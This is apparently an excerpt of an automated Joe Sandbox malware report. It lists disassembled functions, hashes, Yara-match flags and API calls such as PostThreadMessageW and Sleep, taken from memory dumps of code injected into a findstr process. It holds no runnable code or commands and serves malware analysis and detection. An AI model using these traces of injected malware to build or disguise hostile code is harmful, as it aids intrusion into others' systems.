                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction ID: c1b6b2fd9828fc6c843657cd28566b86ca2ecdee4539ebd5f122c98ab2feadd5
                                                • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction Fuzzy Hash: 96E04636240254BBC620AA6ADC04F9B776EDFC9764F518415FA08AB241CBB1B9118AB0
                                                Function 036C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 987c5a07f5d4a2736e3d9f39e65ac4bed0e72656efb52db3b65e9a2cdaa4183e
                                                • Instruction ID: 782f12ac91a9acdfb90c9419026f66277d38b5bf8575eaffd213b40e60eea0af
                                                • Opcode Fuzzy Hash: 987c5a07f5d4a2736e3d9f39e65ac4bed0e72656efb52db3b65e9a2cdaa4183e
                                                • Instruction Fuzzy Hash: DB900235A05814129140B5584888546401597E0301B59C011E0424654D8B548A565361
                                                Function 036C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7205943c6bdb6ffd1272a6efc3c201cf2fa559ddba02dfe3761964dda0cc4fbf
                                                • Instruction ID: aee726488c05c022b1d232569702089b6009de4198f88511b4d16709dbcde6ae
                                                • Opcode Fuzzy Hash: 7205943c6bdb6ffd1272a6efc3c201cf2fa559ddba02dfe3761964dda0cc4fbf
                                                • Instruction Fuzzy Hash: 51900265A01514424140B5584808406601597E1301399C115A0554660D875889559269
                                                Function 036C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f7cf20442a74f50cb3aca6d3f8fa1d3b5c8f0f8eb710684c945493336dfcb9e4
                                                • Instruction ID: 07d9a15a2b75848966a9a17f193c5950514a6b5cbff76b47aa48ac70d005cfc8
                                                • Opcode Fuzzy Hash: f7cf20442a74f50cb3aca6d3f8fa1d3b5c8f0f8eb710684c945493336dfcb9e4
                                                • Instruction Fuzzy Hash: 77900235A0551802D100B5584518706101587D0201F69C411A0424668E87D58A5165A2
                                                Function 036C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dd39184d62a9fb7cddbca700517aaa60c6b738fc99e5c87264f6c8060ff90589
                                                • Instruction ID: 3dfb1814299b0f2d14ae69925c3286f0971f406a416adb691f0af46189af4d1a
                                                • Opcode Fuzzy Hash: dd39184d62a9fb7cddbca700517aaa60c6b738fc99e5c87264f6c8060ff90589
                                                • Instruction Fuzzy Hash: D4900265602414034105B5584418616401A87E0201B59C021E1014690EC66589916125
                                                Function 036C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 61133187a428780a1c60c5d953d3e27ebe80a8971e40ba2d104cdad27bcefa1f
                                                • Instruction ID: ed45c4e060008c39f7e12f5270b9de8177fe9e4e0a81a6a99dcba75cbdad56d3
                                                • Opcode Fuzzy Hash: 61133187a428780a1c60c5d953d3e27ebe80a8971e40ba2d104cdad27bcefa1f
                                                • Instruction Fuzzy Hash: 58900229621414020145F958060850B045597D6351399C015F1416690DC76189655321
                                                Function 036C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 21753bcb95093eea548a20209f92bff7a1f6a9bb11af0a54260d467602d64877
                                                • Instruction ID: 9a2b4f324ff23dc93872b08a22eb28a2c25b2f4d2f94f58875ed1070c679b941
                                                • Opcode Fuzzy Hash: 21753bcb95093eea548a20209f92bff7a1f6a9bb11af0a54260d467602d64877
                                                • Instruction Fuzzy Hash: 7690043D711414030105FD5C070C5070057C7D535135DC031F1015750DD771CD715131
                                                Function 036C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6635990a984c15fb763d65f7288391658bdc5c4b9ac7616781fddb5be63802a6
                                                • Instruction ID: a60df53e288ba0e45faf2dd5b4c8c3f4a0a6013da08f0bcde8d918cebfa45bb8
                                                • Opcode Fuzzy Hash: 6635990a984c15fb763d65f7288391658bdc5c4b9ac7616781fddb5be63802a6
                                                • Instruction Fuzzy Hash: FC90022564546502D150B55C44086164015A7E0201F59C021A0814694E869589556221
                                                Function 036C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1cf26f050c3ecec35d0102408b39828f2fd240c834dc7c36f828aabe3055d88d
                                                • Instruction ID: b3ba8f44ec1fa9e946fd00f1b56a65c644dc374f591f748dac3498f43940c112
                                                • Opcode Fuzzy Hash: 1cf26f050c3ecec35d0102408b39828f2fd240c834dc7c36f828aabe3055d88d
                                                • Instruction Fuzzy Hash: 0C90026574141842D100B5584418B060015C7E1301F59C015E1064654E8759CD526126
                                                Function 036C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a9c78c4caf50a2b861fca815aaebaadee5e6694d4fe79fe3cc00a73509add47f
                                                • Instruction ID: ba6759a0483725d925f50a6be191ff435bbd83ac34e4ca1fcc131c84fa8b83af
                                                • Opcode Fuzzy Hash: a9c78c4caf50a2b861fca815aaebaadee5e6694d4fe79fe3cc00a73509add47f
                                                • Instruction Fuzzy Hash: 1A900225611C1442D200B9684C18B07001587D0303F59C115A0154654DCA5589615521
                                                Function 036C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14b74296d91d234c0ad3ceec31f56fb55836868f3ffa011a29b49c485a41a03e
                                                • Instruction ID: 2a821aa84619bd9c335592960aed9d9ca105de378fc4aeb0cd7d670d07b3b83e
                                                • Opcode Fuzzy Hash: 14b74296d91d234c0ad3ceec31f56fb55836868f3ffa011a29b49c485a41a03e
                                                • Instruction Fuzzy Hash: C0900225A01414424140B56888489064015ABE1211759C121A0998650E869989655665
                                                Function 036C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4adc9d5e9dae31ade3aefdffc7b93bf75070845ab71ea71ec468afea0ad6aa6c
                                                • Instruction ID: 55d0e5804fe1874976cf181d5539354b6b3ed6dacf5d47163e3acbbe040ef0fa
                                                • Opcode Fuzzy Hash: 4adc9d5e9dae31ade3aefdffc7b93bf75070845ab71ea71ec468afea0ad6aa6c
                                                • Instruction Fuzzy Hash: BA90026560181803D140B9584808607001587D0302F59C011A2064655F8B698D516135
                                                Function 036C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 03b7e9c9a29220ff67990dc64c4272a719178b80b0ac60bf62cb21fe71cd5cf8
                                                • Instruction ID: daaf83451f8e3cc892bd6b8caa402fb5c0641bd74573ac72434661fd61bd74f2
                                                • Opcode Fuzzy Hash: 03b7e9c9a29220ff67990dc64c4272a719178b80b0ac60bf62cb21fe71cd5cf8
                                                • Instruction Fuzzy Hash: 2190043570141403D140F55C541C7074015D7F1301F5DD011F0414754DDF55CD575333
                                                Function 036C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 098bd15db39e4845c62106ac2f889eee161967339651bb5fe51b7b5e39d170b9
                                                • Instruction ID: ceabb9f616f0405131e2e4eac8e667e2df06353a0075c830386ef47d0c3abb64
                                                • Opcode Fuzzy Hash: 098bd15db39e4845c62106ac2f889eee161967339651bb5fe51b7b5e39d170b9
                                                • Instruction Fuzzy Hash: 5D90022D61341402D180B558540C60A001587D1202F99D415A0015658DCA5589695321
                                                Function 036C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dc5dedcd27de0d01b0517ee24abfe954d2c1c63b0019af024aa7e87f356b5238
                                                • Instruction ID: 2f334509fefdb1fd19e287f63ccaa0b10822f6a8af935b6be284f3cbec33dce9
                                                • Opcode Fuzzy Hash: dc5dedcd27de0d01b0517ee24abfe954d2c1c63b0019af024aa7e87f356b5238
                                                • Instruction Fuzzy Hash: 6A90023560141813D111B5584508707001987D0241F99C412A0424658E97968A52A121
                                                Function 036C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cc8ca4681e0821ee94b98e34da0a3ef0a0429a1bd538e3b17e50ed0083c79287
                                                • Instruction ID: 875f8ffa504271fabc37927466e614b0c7f914113985a044bed9723bd69a4dc5
                                                • Opcode Fuzzy Hash: cc8ca4681e0821ee94b98e34da0a3ef0a0429a1bd538e3b17e50ed0083c79287
                                                • Instruction Fuzzy Hash: D6900225642455525545F5584408507401697E0241799C012A1414A50D86669956D621
                                                Function 036C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c9bc93d7d0a594a1a5e9040bcb72d94d9238d92e7d0acadb69997781a309d242
                                                • Instruction ID: 3fb5564478ee46afeb895c7496e79830d53ce9a0c23553301cffe8cf531bff0f
                                                • Opcode Fuzzy Hash: c9bc93d7d0a594a1a5e9040bcb72d94d9238d92e7d0acadb69997781a309d242
                                                • Instruction Fuzzy Hash: 9A90023560141C42D100B5584408B46001587E0301F59C016A0124754E8755C9517521
                                                Function 036C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2e10dd04c6e050c8d2afcd16fe6ca1b7c7c3873054fc9c2592c896ec68a3cf0a
                                                • Instruction ID: ff487dc972255548cebfbf598560e5691369515b85d4c7510e38022022958236
                                                • Opcode Fuzzy Hash: 2e10dd04c6e050c8d2afcd16fe6ca1b7c7c3873054fc9c2592c896ec68a3cf0a
                                                • Instruction Fuzzy Hash: EF90023560149C02D110B558840874A001587D0301F5DC411A4424758E87D589917121
                                                Function 036C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b4274f013bc6cbaabde11135a9a1e21f938616c29a66ba78182d53b91ef18518
                                                • Instruction ID: dbbb2392169e7fc6c0d6ad7a1009f980742d64990c86c5d4f75341a3707ad538
                                                • Opcode Fuzzy Hash: b4274f013bc6cbaabde11135a9a1e21f938616c29a66ba78182d53b91ef18518
                                                • Instruction Fuzzy Hash: A390023560141802D100B998540C646001587E0301F59D011A5024655FC7A589916131
                                                Function 02E50B17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 438 2e50b17-2e50b1c 439 2e50b5e-2e50bb0 call 2e6a000 call 2e6aa10 438->439 440 2e50b1e-2e50b3b 438->440 445 2e50bb5-2e50bf7 call 2e54530 call 2e41410 call 2e61350 439->445 442 2e50b3d-2e50b54 440->442 443 2e50ba8-2e50baf 440->443 442->439 443->445 446 2e50bb0 call 2e6aa10 443->446 455 2e50c17-2e50c1d 445->455 456 2e50bf9-2e50c08 PostThreadMessageW 445->456 446->445 456->455 457 2e50c0a-2e50c14 456->457 457->455
                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                                                • Instruction ID: 903bd35f0be5de3b07b6d16806c80ac4158e6b7f38ac14ed6fb98eaff9188c1d
                                                • Opcode Fuzzy Hash: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                                                • Instruction Fuzzy Hash: 39118972880168BADB029B60DC45EEFFF3DEF42358F0880ADF95467141E6264E128BA1
                                                Function 02E50B56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 458 2e50b56-2e50b5c 459 2e50b97-2e50bf7 call 2e6a000 call 2e6aa10 call 2e54530 call 2e41410 call 2e61350 458->459 460 2e50b5e 458->460 471 2e50c17-2e50c1d 459->471 472 2e50bf9-2e50c08 PostThreadMessageW 459->472 460->459 472->471 473 2e50c0a-2e50c14 472->473 473->471
                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                                                • Instruction ID: 59eeb6e5b8dbbcc5d3df3bbe41a88606c2e4b309407d90835cd94982657d73ec
                                                • Opcode Fuzzy Hash: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                                                • Instruction Fuzzy Hash: D401D672D8021CBADB119AD09C81EEFBB7CDF45798F04D064FA14BB240E6355E468BA1
                                                Function 02E50B88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                                                • Instruction ID: e8a337af2ce99243604538fa71367f23d9b27d419d498dc5776f7c5ecd4cc62d
                                                • Opcode Fuzzy Hash: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                                                • Instruction Fuzzy Hash: 3B11C871D8111C7EEB119A909C81EFFBB7CDF45698F049069FA04B7140D6355F068BA1
                                                Function 02E50B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                                                • Instruction ID: 591a7ea7645d4f31513fd03223682d4c4b411ab684635abeaf6638391062b79b
                                                • Opcode Fuzzy Hash: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                                                • Instruction Fuzzy Hash: 0901D6B2D8021C7ADB01AAE09C81EFFBB7CDF45698F04C064FA04B7240E6755E068BB1
                                                Function 02E62C20 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 02E62CDC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
